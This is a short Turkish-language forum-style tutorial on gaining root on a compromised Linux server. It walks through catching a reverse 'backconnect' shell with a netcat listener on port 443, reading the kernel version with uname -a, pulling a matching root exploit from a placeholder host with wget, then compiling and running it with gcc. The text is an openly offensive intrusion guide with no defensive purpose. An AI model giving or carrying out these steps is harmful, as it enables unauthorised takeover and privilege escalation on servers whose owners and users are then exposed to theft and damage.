Serverda root olmak için, öncelikle backconnect yapabileceğiniz bir shell lazım. Ayrıca, netcat (nc) olması lazım. Bunlar mevcutsa artık işleme geçebiliriz.
Shellde backconnect olma yerine geldiğinizde, sizden orada dinlemeye alacağınız portu girmeniz istenir.
Kendi bilgisayarınızda, herhangi bir portu açmanız ve onu backconnect de girmeniz lazım. Yani dinleyeceğiniz portun PC nizde açı olması lazım. Gelelim nasıl backconect yapacağız? netcat açın, (nc.exe) nc örneğin bilgisayarınızda, 443 portu açık.
Bunu kullanacağız. Şimdi; nc -v -l -p 443 komutunu nc den verin. Ardından, backconnect yerinde 443 yazıp connect deyin. Kısa bir süre içinde komut isteminde shell ekranı gelecektir. Eee backconnect olduk ne oldu şimdi? buraya root exploitimiz çekeceğiz.
shellde uname -a dan sonra kernel versiyonu yazar. linux 2.x.x filan örneğin linux 2.3.6 salladım. Bunun için internetten root exploit çekelim.
Örneğin explloit burada;
www.exploit.com/2.3.6.c alalım. wget
www.exploit.com/2.3.6.c sisteme çektik.
şimdi; gcc -o exploit 2.3.6.c ( exploit yazdığım yer, 2.3.6 explotinin yeni adı )
ardından derleme işi bitmiştir. Artık; ./exploit diyerek exploite girebilirsiniz. Artık server root. Gerisi sistemde komut çalıştırmaya kalır.
